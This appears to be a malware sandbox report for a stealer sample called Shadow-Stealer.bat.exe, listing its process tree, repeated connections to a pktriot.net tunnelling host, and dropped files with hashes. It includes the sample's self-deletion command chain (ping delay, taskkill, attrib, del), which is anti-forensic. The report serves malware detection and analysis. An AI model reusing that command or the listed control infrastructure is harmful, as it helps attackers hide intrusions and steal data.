C:\Windows\system32\WerFault.exe -u -p 5836 -s 288

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

PING localhost -n 8

C:\Windows\system32\taskkill.exe

taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\attrib.exe

ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 throbbing-mountain-09011.pktriot.net udp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
US 52.111.229.48:443 tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
US 8.8.8.8:53 throbbing-mountain-09011.pktriot.net udp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
US 8.8.8.8:53 throbbing-mountain-09011.pktriot.net udp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe

MD5 0e9ccd796e251916133392539572a374
SHA1 eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256 c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512 e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

memory/1904-4-0x00007FF909993000-0x00007FF909995000-memory.dmp

memory/1904-5-0x000001A878150000-0x000001A878172000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4wucjnjo.icx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1904-14-0x00007FF909990000-0x00007FF90A452000-memory.dmp

memory/1904-15-0x00007FF909990000-0x00007FF90A452000-memory.dmp

memory/1904-16-0x00007FF909990000-0x00007FF90A452000-memory.dmp

memory/1904-17-0x000001A818000000-0x000001A818024000-memory.dmp

memory/1904-18-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp

memory/1904-19-0x00007FF929AD0000-0x00007FF929B8D000-memory.dmp

memory/1904-20-0x00007FF909990000-0x00007FF90A452000-memory.dmp

memory/1904-21-0x00007FF909990000-0x00007FF90A452000-memory.dmp

memory/1904-22-0x00007FF909990000-0x00007FF90A452000-memory.dmp

memory/1904-23-0x000001A818330000-0x000001A818D80000-memory.dmp

memory/1904-25-0x000001A818D80000-0x000001A818E26000-memory.dmp

memory/1904-26-0x000001A818E30000-0x000001A818E86000-memory.dmp

memory/1904-27-0x000001A818E90000-0x000001A818EE8000-memory.dmp

memory/1904-31-0x000001A8191E0000-0x000001A8191EA000-memory.dmp

memory/4988-33-0x0000000140000000-0x0000000140004000-memory.dmp

memory/2076-36-0x0000000000400000-0x0000000000406000-memory.dmp

memory/4988-35-0x0000000140000000-0x0000000140004000-memory.dmp

memory/2076-38-0x0000000000400000-0x0000000000406000-memory.dmp

memory/1904-32-0x00007FF909990000-0x00007FF90A452000-memory.dmp

memory/1904-29-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp

memory/1904-28-0x000001A818EF0000-0x000001A818F12000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 356e04e106f6987a19938df67dea0b76
SHA1 f2fd7cde5f97427e497dfb07b7f682149dc896fb
SHA256 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
SHA512 df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

C:\Windows\$sxr-cmd.exe

MD5 c5db7b712f280c3ae4f731ad7d5ea171
SHA1 e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
SHA256 f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
SHA512 bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

memory/3264-60-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp

memory/3264-61-0x00007FF929AD0000-0x00007FF929B8D000-memory.dmp

memory/3264-62-0x000002C0B7EB0000-0x000002C0B8436000-memory.dmp

memory/3264-63-0x000002C0C0510000-0x000002C0C0CDA000-memory.dmp

memory/3264-64-0x000002C0C0CE0000-0x000002C0C111E000-memory.dmp

memory/3264-65-0x000002C0C1120000-0x000002C0C11D2000-memory.dmp

memory/3264-66-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp

memory/1904-72-0x00007FF909993000-0x00007FF909995000-memory.dmp

memory/3264-75-0x000002C0B8A50000-0x000002C0B8AA0000-memory.dmp

memory/3264-76-0x000002C0B8B60000-0x000002C0B8C12000-memory.dmp

memory/3264-77-0x000002C0B92D0000-0x000002C0B9492000-memory.dmp

memory/3264-86-0x000002C0B8AA0000-0x000002C0B8ADC000-memory.dmp

memory/1904-87-0x00007FF909990000-0x00007FF90A452000-memory.dmp

memory/3264-88-0x000002C0B8A00000-0x000002C0B8A4E000-memory.dmp

memory/3264-89-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp

memory/3264-90-0x00007FF929AD0000-0x00007FF929B8D000-memory.dmp

memory/3264-91-0x000002C0B8AE0000-0x000002C0B8B16000-memory.dmp

memory/1684-93-0x0000000140000000-0x0000000140028000-memory.dmp

memory/1684-92-0x0000000140000000-0x0000000140028000-memory.dmp

memory/1684-95-0x00007FF929AD0000-0x00007FF929B8D000-memory.dmp

memory/636-99-0x000001E352630000-0x000001E352657000-memory.dmp

memory/692-109-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp

memory/1000-112-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp

memory/708-116-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp

memory/1136-135-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp

memory/1136-134-0x0000022671A90000-0x0000022671AB7000-memory.dmp

memory/1084-132-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp

memory/1084-131-0x000002B42FA90000-0x000002B42FAB7000-memory.dmp

memory/1076-129-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp

memory/1076-128-0x000002613A320000-0x000002613A347000-memory.dmp

memory/752-126-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp

memory/752-125-0x000002AB7E110000-0x000002AB7E137000-memory.dmp

memory/708-115-0x0000026FC3DA0000-0x0000026FC3DC7000-memory.dmp

memory/1000-111-0x000001A1CE490000-0x000001A1CE4B7000-memory.dmp

memory/556-107-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp

memory/556-106-0x00000196518B0000-0x00000196518D7000-memory.dmp

memory/636-103-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp

memory/692-101-0x000001C437430000-0x000001C437457000-memory.dmp

memory/636-98-0x000001E352600000-0x000001E352622000-memory.dmp

memory/1684-96-0x0000000140000000-0x0000000140028000-memory.dmp

memory/1684-94-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp

memory/1904-357-0x00007FF909990000-0x00007FF90A452000-memory.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.346cb33f-8fd2-4800-b246-867b7e846e0d.tmp.csv

MD5 5356104d522b9b83775b67022ce4c870
SHA1 23a2e6dd8771b60a2c93e2c86d2b2d3c9ecc0b1e
SHA256 08c01857a0126046397dd9f2d402975ea04ea2386995c9802a282d1328435d4d
SHA512 9660583545b7da3b693be46e06f3fb75e870d6da0cd78db3478217e5ce4f58631a6465b4751d3113f0ca4996198cf59f45aff813a2bc1d064e0f7a532e34466c

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.7182e2f9-39d2-4bc9-bf2c-3211c78c11fc.tmp.txt

MD5 269ebbee8017d398827c5614a8544eef
SHA1 df6ef0c3309f586a2c72d28e941b8ce1962a47db
SHA256 711671a78446fce771bb2898711f005b4fed3617cb790d1706d6108ca47c70f6
SHA512 462603f466cb0b8ca943b65029bd395aea3fa797d35bfa81bb9a74f418ba091680497dd3e25d8e81d549d82b3a877e9c937b99a6e1f04f3de1099940d243d851

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.398afaa8-91f0-4bb1-9c4b-c59d79210788.tmp.csv

MD5 afcb6894ba6405213ef1d753c1ad6373
SHA1 c224528e189ba64d00ac0de599520ac366f8ce49
SHA256 a5479e0b92db219695d1a4c528eed0fc057843b7ef32eede75c8d4ad01c345e1
SHA512 c2a6f7d09b12be3879b9af82de6bdc325e9c7dc99cbd3311d72691e6dca9c3657a16a4e075498c5cce5bf6b7b13f58a389e928b1678b900391177f5c7d4c6d56

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.587879dd-dfa7-4781-9c88-7f012501f9bc.tmp.txt

MD5 8d721bd8e65c6c1a601cf3ca7e8a1ca5
SHA1 c6edf4513067f95da94465b92e45730058a9662f
SHA256 f58e81ff7164aef284b5473f14e7955d2fda43f83fe3ef4937065e8e0670317d
SHA512 d73ad10ebf113e51aeb3d3a6cbb3235d5063c29920ac3e1012c0b942315497c9d25c3aedaff5c987538fd291cb50cba64f5a96ba957d6fdfb4efe8339caa3aae

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.2e892adc-8c81-41cd-891e-3af2f5c3f43d.tmp.csv

MD5 cceb2282a17391dd8b3b58127b63b677
SHA1 695db1fde4cfe0ce62a0630517865b54f8415dcc
SHA256 5697f65e0ddb0a1309414dc28a97b04ffe17b6178dc4f43181a3c09614ec07d3
SHA512 a6d84c3edaba4ad2d43c9d686c8f5f3a7a203bab15c709a8c464e5362e810502961c6aeffe3b41d172c838bcec20c9f673f8492b8824b49dff1c2b5ac0963e09

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.fd609eca-fc31-49fc-9d06-a612ecef8067.tmp.txt

MD5 cebbd39d5b68423f649441e18c1efd2d
SHA1 ae4547efdc5dcd02c99ca42ddd07ef62cf63da7f
SHA256 fadb6334f2c3b90faa4320bac5d92bc6cb82081c6f40cfef987d33aaf669d040
SHA512 4438d7694ab78de3b83e64458031b704495df4e3f950ca229939c41c57fc529973ebc08a16f8ede044c93d422c8bcc8bf8df0b18c91e8e9ee3de4332bb0c29f0

memory/1904-1405-0x00007FF909990000-0x00007FF90A452000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 14c2a0799e3bd5d29ba4ff6ce84adde8
SHA1 55bbba506947f9fa0478c1fe36cec9f587bd6fad
SHA256 708c34d1f7aad1c51eb3bb973843e4d01affecad5693201060a5ccd578fb7d93
SHA512 273028ffba769f00950abc541bc305c23f4636ef5f3905f3fe64f59ca96d25c69f30ba932f6e1e00f4d94f5306ee449c8e8b90ac022ca9dcb70ca5e3fe40d944

C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

MD5 60ff1ec5d8b2bfc71402c97ddec1b563
SHA1 6a2f7b6d470d1dbfbae6a32b424a92cbc77a01f8
SHA256 79fccbbe8e5e82bbcde6de196ac2fdcc15345972243ae738750973747a8c05ce
SHA512 f6e28784af15568b44244e2954104361d4ee0df28f78f373be01bc2a70a6ca9758e6eea3710dd8a8fc99f51496d3798a6134d45c43d551ec2920b731c3c93ee6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

MD5 76e20105efa6a187d6ff9134656f83bb
SHA1 4afc337579d22b55ab9f86dd8a41f4d2569227f7
SHA256 85fdcf5b2a407ff2552f77c441215887df0b9aa95fae0b0a025c82bc833c2c32
SHA512 a11199175c3c94c0281730d44bd4c0f0f35773359354cca76dc9f87eebb01b412418291f8447f6f43909ced8dbe4ec5a993c88b0d39d6ec63d8700b0ad300844